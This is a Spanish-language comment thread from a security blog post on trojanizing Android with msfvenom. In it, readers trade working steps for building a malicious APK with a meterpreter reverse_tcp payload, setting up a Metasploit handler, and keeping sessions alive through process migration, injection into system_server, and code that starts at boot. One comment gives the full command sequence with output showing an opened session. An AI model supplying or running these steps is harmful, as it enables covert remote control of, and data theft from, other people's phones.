tag:blogger.com,1999:blog-7938680518783212855.post5743139681112814090..comments2024-03-24T10:55:25.650+01:00Comments on Flu Project | Zerolynx Cybersecurity Blog: Troyanizando Android con Msfvenom Juan Antonio Calleshttp://www.blogger.com/profile/08021859006811664777noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-7938680518783212855.post-3343384868884064542020-04-03T16:03:35.273+02:002020-04-03T16:03:35.273+02:00cuales son los comandos?
cuales son los comandos?<br />Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-43498145704292259462019-11-19T00:37:37.024+01:002019-11-19T00:37:37.024+01:00Hola, esto es para androids, hoy les quiero compar...Hola, esto es para androids, hoy les quiero compartir esta informacion y es que he estado los ultimos dos dias intentando que el payload funcionara, he leido mucho sobre el tema, pero no podia solucionar el problema que era principalmente el de la comunicacion entre los programas, bueno aqui les voy a dar unas recomendaciones y recordad que esto es en lan.<br /><br />1. El dispositivo atacante debe de tener una ip fija (Esta configuracion puede realizarse desde el router) busquen un video o informacion de como hacerlo.<br />2. usad en LHOST=8080, las dos veces que me funciono utilize ese puerto, asi que se los recomiendo junto al predeterminado 4444.<br />3.Estar seguros de que estan escribiendo correctamente.<br /><br />Si aparece No plataform was selected, choosing msf... no se preocupen que el programa lo adacta y funcionara correctamnete<br /><br />si solo les aparece [*] Started reverse TCP handler on 192.168.xxx.xxx intenten instalar la aplicacion y despues de intalada abrirla. alguna pregunta pueden dejarmela yo intentare responderla o alguien mas lo hara por mi.<br /><br />AQUI LES DEJO LOS COMANDOS QUE UTILIZE, TODO JUNTO Y PUEDEN IR SIGUIENDOLO.<br /><br /><br /><br /><br />root@ZioOn:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=8080 R> prototipo.apk<br />[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload<br />[-] No arch selected, selecting arch: dalvik from the payload<br />No encoder or badchars specified, outputting raw payload<br />Payload size: 10092 bytes<br /><br />root@ZioOn:~# msfconsole<br /> <br /><br /> <br />+ -- --=[ 1886 exploits - 1066 auxiliary - 328 post ]<br />+ -- --=[ 546 payloads - 44 encoders - 10 nops ]<br />+ -- --=[ 2 evasion ]<br /><br />[*] Starting persistent handler(s)...<br />msf5 > use exploit/multi/handler<br />msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp <br />payload => android/meterpreter/reverse_tcp<br />msf5 exploit(multi/handler) > show options<br /><br />Module options (exploit/multi/handler):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /><br /><br />Payload options (android/meterpreter/reverse_tcp):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> LHOST yes The listen address (an interface may be specified)<br /> LPORT 4444 yes The listen port<br /><br /><br />Exploit target:<br /><br /> Id Name<br /> -- ----<br /> 0 Wildcard Target<br /><br /><br />msf5 exploit(multi/handler) > set LHOST 192.168.0.107<br />LHOST => 192.168.0.107<br />msf5 exploit(multi/handler) > set LPORT 8080<br />LPORT => 8080<br />msf5 exploit(multi/handler) > show options<br /><br />Module options (exploit/multi/handler):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /><br /><br />Payload options (android/meterpreter/reverse_tcp):<br /><br /> Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> LHOST 192.168.0.107 yes The listen address (an interface may be specified)<br /> LPORT 8080 yes The listen port<br /><br /><br />Exploit target:<br /><br /> Id Name<br /> -- ----<br /> 0 Wildcard Target<br /><br /><br />msf5 exploit(multi/handler) > exploit<br /><br />[*] Started reverse TCP handler on 192.168.0.107:8080 <br />[*] Sending stage (72198 bytes) to 192.168.0.106<br />[*] Meterpreter session 1 opened (192.168.0.107:8080 -> 192.168.0.xxx:xxxx) at 2019-11-18 15:09:57 -0800<br /><br />meterpreter > Interrupt: use the 'exit' command to quit<br />meterpreter > <br /><br />busquen el resto<br />Anonymoushttps://www.blogger.com/profile/09651805761957432106noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-81038985891975487452019-11-19T00:35:20.013+01:002019-11-19T00:35:20.013+01:00si, se coloca tu ip, la puedes sacar con ifconfig ...si, se coloca tu ip, la puedes sacar con ifconfig en kali linux, o ipconfing en cmd windowsAnonymoushttps://www.blogger.com/profile/09651805761957432106noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-3596694210970799142018-12-22T19:04:54.107+01:002018-12-22T19:04:54.107+01:00hola, a mi me dice msfvenom command not found, que...hola, a mi me dice msfvenom command not found, que hago?Anonymoushttps://www.blogger.com/profile/13233378501849556050noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-41147379633867286962018-01-25T05:31:13.525+01:002018-01-25T05:31:13.525+01:00julio guerrero, eso solo funciona para payload de ...julio guerrero, eso solo funciona para payload de windows<br />en android no funciona el comando migrate según tengo entendidoLenin Cabrerahttps://www.blogger.com/profile/11500095075404150289noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-81122421330204579432017-12-30T15:37:32.757+01:002017-12-30T15:37:32.757+01:00Ayuda por favor, a mi me aparece el mismo error de...Ayuda por favor, a mi me aparece el mismo error de que se sbre y se cierra la sesión y dicen que hay que migrar uno de los registros pero ni siquiera me aparece la consola meterpreter solo aparece como si estuviera cargando y se cierraAnonymoushttps://www.blogger.com/profile/00582932149951928034noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-2866773224207861602017-12-30T15:36:11.148+01:002017-12-30T15:36:11.148+01:00A mi ni siquiera me abre la consola meterpreterA mi ni siquiera me abre la consola meterpreterAnonymoushttps://www.blogger.com/profile/00582932149951928034noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-30607117128498593332017-10-03T22:17:54.528+02:002017-10-03T22:17:54.528+02:00type:
:$ use multi/handler
:$ set payload android/...type:<br />:$ use multi/handler<br />:$ set payload android/shell/reverse_tcp<br />:$ set lhost 192.168.x.x<br />:$ set lport 8888<br />:$ set processinject system_server<br />:$ set exploit -j<br /><br />Krypt0nhttps://www.blogger.com/profile/01446126985086370033noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-35225801878507685222017-10-03T22:10:55.266+02:002017-10-03T22:10:55.266+02:00lo que puedes hacer es usar el venom para inyectar...lo que puedes hacer es usar el venom para inyectarle codigo de mainactivity y activandola para que se incie en paralelo desde el encendido del movil Krypt0nhttps://www.blogger.com/profile/01446126985086370033noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-56948933926573664462017-07-23T06:42:18.910+02:002017-07-23T06:42:18.910+02:00graciasgraciasAnonymoushttps://www.blogger.com/profile/00972432812636018766noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-75567561186742552242017-07-23T06:41:59.718+02:002017-07-23T06:41:59.718+02:00yo lo hice todo bien, pero al momento de estar en ...yo lo hice todo bien, pero al momento de estar en la msfconsole le doy use exploit/multi/handler y luego set payload android/meterpreter/reverse_tcp, se supone que ya me tendria que reconocer el virus pero le doy show options para ver si esta y no me sale el autoloadandroid que hago??Anonymoushttps://www.blogger.com/profile/00972432812636018766noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-30892869069066487442017-05-27T20:35:51.661+02:002017-05-27T20:35:51.661+02:00Este comentario ha sido eliminado por el autor.Anonymoushttps://www.blogger.com/profile/18115268960728556596noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-20902533976018551252017-05-08T03:24:00.382+02:002017-05-08T03:24:00.382+02:00eso es por que tienes que migrar el proceso, coloc...eso es por que tienes que migrar el proceso, coloca ps cuando estes en la consola ddel meterpreter, luego colocas migrate -(el numero del pid del proceso)asi tenras una conexion sin caidaAnonymoushttps://www.blogger.com/profile/14526953083473824654noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-85892362752509188242016-07-01T05:03:37.683+02:002016-07-01T05:03:37.683+02:00a mi nisiquiera me instala la app porfavor... ayud...a mi nisiquiera me instala la app porfavor... ayuda my cel es sansung...mmirraaarrhttps://www.blogger.com/profile/17415277491095840367noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-73014845113799267582016-06-23T23:58:09.753+02:002016-06-23T23:58:09.753+02:00en lhost metemos esa ip o la nuestra?
y en el puer...en lhost metemos esa ip o la nuestra?<br />y en el puerto?<br /><br />Anonymoushttps://www.blogger.com/profile/11290607969506756620noreply@blogger.comtag:blogger.com,1999:blog-7938680518783212855.post-38929093280572698532016-02-19T03:37:45.576+01:002016-02-19T03:37:45.576+01:00Muy sencillo de utilizar, pero la verdad es que pa...Muy sencillo de utilizar, pero la verdad es que para mi no fue muy funcional ya que tengo que iniciar el apk constantemente, debido a que se desconecta:<br />Meterpreter session 5 closed. Reason: Diedazuaxhttps://www.blogger.com/profile/17552666615774943868noreply@blogger.com